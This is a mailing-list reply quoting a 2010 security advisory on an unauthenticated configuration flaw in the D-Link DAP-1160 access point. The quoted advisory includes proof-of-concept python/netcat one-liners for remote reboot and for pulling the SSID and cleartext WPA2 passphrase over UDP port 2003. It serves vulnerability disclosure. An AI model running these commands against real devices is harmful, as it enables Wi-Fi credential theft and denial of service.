Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

[Cristofaro Mune <pulsoid () icysilence org>]

Being the D-Link DAP-1160 an Access Point and not a router it does not
have a specific WAN interface.
Nonetheless, the UDP 2003 port is open and reachable from all the
available interfaces on this device.

Best Regards,
Cristofaro Mune


Gary Baribault wrote:
> Is that UDP 2003 open on the WAN interface as well?
>
> Gary Baribault
>
>
> On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
> > Security Advisory
>
>
>
> >
>
>
>
> > IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote
>
> Configuration
>
>
>
> >
>
>
>
> >
>
>
>
> >
>
>
>
> > Advisory Information
>
>
>
> > --------------------
>
>
>
> > Published:
>
>
>
> > 2010-06-28
>
>
>
> >
>
>
>
> > Updated:
>
>
>
> > 2010-06-28
>
>
>
> >
>
>
>
> > Manufacturer: D-Link
>
>
>
> > Model: DAP-1160
>
>
>
> > Firmware version: 1.20b06
>
>
>
> >           1.30b10
>
>
>
> >           1.31b01
>
>
>
> >
>
>
>
> >
>
>
>
> >
>
>
>
> > Vulnerability Details
>
>
>
> > ---------------------
>
>
>
> >
>
>
>
> > Public References:
>
>
>
> > Not Assigned
>
>
>
> >
>
>
>
> >
>
>
>
> > Platform:
>
>
>
> > Successfully tested on D-Link DAP-1160 loaded with firmware
>
> versions:
>
>
>
> > v120b06, v130b10, v131b01.
>
>
>
> > Other models and/or firmware versions may be also affected.
>
>
>
> > Note: Only firmware version major numbers are displayed on the
>
>
>
> > administration web interface: 1.20, 1.30, 1.31
>
>
>
> >
>
>
>
> >
>
>
>
> > Background Information:
>
>
>
> > D-Link DAP-1160 is a wireless access points that allow wireless
>
> clients
>
>
>
> > connectivity to wired networks.
>
>
>
> > Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2
>
> supported.
>
>
>
> >
>
>
>
> >
>
>
>
> > Summary:
>
>
>
> > Unauthenticated access and modification of several device
>
> parameters,
>
>
>
> > including Wi-Fi SSID, keys and passphrases is possible.
>
>
>
> > Unauthenticated remote reboot of the device can be also
>
> performed.
>
>
>
> >
>
>
>
> >
>
>
>
> > Details:
>
>
>
> > DCCD is an UDP daemon that listens on port UDP 2003 of the
>
> device, that
>
>
>
> > is likely used for easy device configuration via the DCC (D-Link
>
> Click
>
>
>
> > 'n Connect) protocol.
>
>
>
> > By sending properly formatted UDP datagrams to dccd daemon it is
>
>
>
> > possible to perform security relevant operation without any
>
> previous
>
>
>
> > authentication.
>
>
>
> > It is possible to remotely retrieve sensitive wireless
>
> configuration
>
>
>
> > parameters, such as Wi-Fi SSID, Encryption types, keys and
>
> passphrases,
>
>
>
> > along with other additional information.
>
>
>
> > It is also possible to remotely modify such parameters and
>
> configure the
>
>
>
> > device without any knowledge of the web administration password.
>
>
>
> > Remote reboot is another operation that an attacker may perform
>
> in an
>
>
>
> > unauthenticated way, possibly triggering a Denial-of-Service
>
> condition.
>
>
>
> >
>
>
>
> >
>
>
>
> > POC:
>
>
>
> > - Remote reboot
>
>
>
> > python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR>
>
> 2003
>
>
>
> >
>
>
>
> > - Retrieving Wi-Fi SSID
>
>
>
> > python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o
>
> ssid.txt
>
>
>
> > -u <IP_ADDR> 2003
>
>
>
> > cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
>
>
>
> > received datagram)
>
>
>
> >
>
>
>
> > - Retrieving WPA2 PSK
>
>
>
> > python -c 'print "\x03" + "\x00" * 7 +
>
> "\x23\x27\x00\x00\x24\x27\x00"' |
>
>
>
> > nc -u -o pass.txt <IP_ADDR> 2003
>
>
>
> > cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx"
>
> in the
>
>
>
> > received datagram)
>
>
>
> >
>
>
>
> >
>
>
>
> > Impacts:
>
>
>
> > Remote extraction of sensitive information
>
>
>
> > Modification of existing device configuration
>
>
>
> > POssible Denial-of-Service
>
>
>
> >
>
>
>
> >
>
>
>
> > Solutions & Workaround:
>
>
>
> > Not available
>
>
>
> >
>
>
>
> >
>
>
>
> >
>
>
>
> > Additional Information
>
>
>
> > ----------------------
>
>
>
> > Timeline (dd/mm/yy):
>
>
>
> > 17/02/2010: Vulnerability discovered
>
>
>
> > 17/02/2010: No suitable technical/security contact on
>
> Global/Regional
>
>
>
> > website. No contact available on OSVDB website
>
>
>
> > 18/02/2010: Point of contact requested to customer service
>
>
>
> > ----------- No response -----------
>
>
>
> > 26/05/2010: Partial disclosure at CONFidence 2010
>
>
>
> > 28/06/2010: This advisory
>
>
>
> >
>
>
>
> >
>
>
>
> > Additional information available at http://www.icysilence.org
>
>
>
> >
>
>
>
> > _______________________________________________
>
>
>
> > Full-Disclosure - We believe in it.
>
>
>
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>
>
>
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> >
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/